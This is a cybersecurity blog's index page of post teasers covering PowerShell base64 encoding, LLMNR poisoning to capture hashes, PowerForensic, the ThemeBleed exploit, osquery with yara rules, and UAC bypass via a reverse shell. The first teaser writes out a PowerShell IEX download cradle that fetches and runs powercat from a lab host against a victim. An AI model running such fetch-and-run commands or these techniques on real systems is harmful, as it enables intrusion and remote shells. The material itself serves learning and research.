init In one case I have discovered some strange issue which I have never faced before. I was trying execute a powershell command as shown below: IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1') How ever interestingly, if I use CyberChef to encode the above command to base64 so that I can use powershell -e to decode the code and then execute on the victim machine. If the encoding is done on the CyberChef, we get the below:

Continue reading

In this case, we will look into how we can use LLMNR to poisoning to get the hash for a specific user and crack that in order to gain access. We have a domain called master.loc where the domain controller is dc1. The client workstation is client1. LLMNR is a protocol which is used to discover any hosts present in the network. In our scenario, we will try to access a fileserver called wow.

Continue reading

In this case, we will look into how we can use LLMNR to poisoning to get the hash for a specific user and crack that in order to gain access. We have a domain called master.loc where the domain controller is dc1. The client workstation is client1. LLMNR is a protocol which is used to discover any hosts present in the network. In our scenario, we will try to access a fileserver called wow.

Continue reading

init If you want to find out which executable were executed on a workstation in windows it is bit tricky to find. There are some ways you can detect that. In this post we will look into PowerForensic powershell scripts to check some of its features. PowerForensic After you download and import the script, you will see the following commands available to the system. Remember to run the powershell as Administrator Below we can see that we can get last execution time for a specific application.

Continue reading

Themebleed exploit

init Lets try to exploit the yet-another-windows-vulnerability known as CVE-2023-38146 aka ThemeBleed. To do that we need to create the theme file which will consist of “path” from where the payloads will be delivered. Please note that as per my testing, the command execution only happens if both the SMB server and the theme file is in the same machine. Pulling dll(s) from remote system appears not to work. In the attacker machine, you will need to disable the SMB by disabling the Server service from the services.

Continue reading

osquery and yara rules

init In the previous post 1 we have installed osquery and seen how it works. In the writeup, we will try to match a yara rule with one of the file we will create to understand how it wall works. Now we will make a directory in the home directory called yara-rules in that directory you will need two files. The contents of those files are given below: $ cat ~/yara-rules/example1.

Continue reading

init The primary objective of this writeup is to check if an attacker can use this technique to bypass UAC and gain additional privilege ONLY using Command / Powershell window got from a Reverse Shell. User Account Control (UAC) in Windows is a “feature” (do not know how to attribute it) which can be used to prevent a user from making unwanted changes into the system. When running a application in a privileged permission, Windows asks the user if the action is actually legit.

Continue reading

Author's picture

rezaur rahman

just thinking out loud to help others

cybersecurity researcher

Mars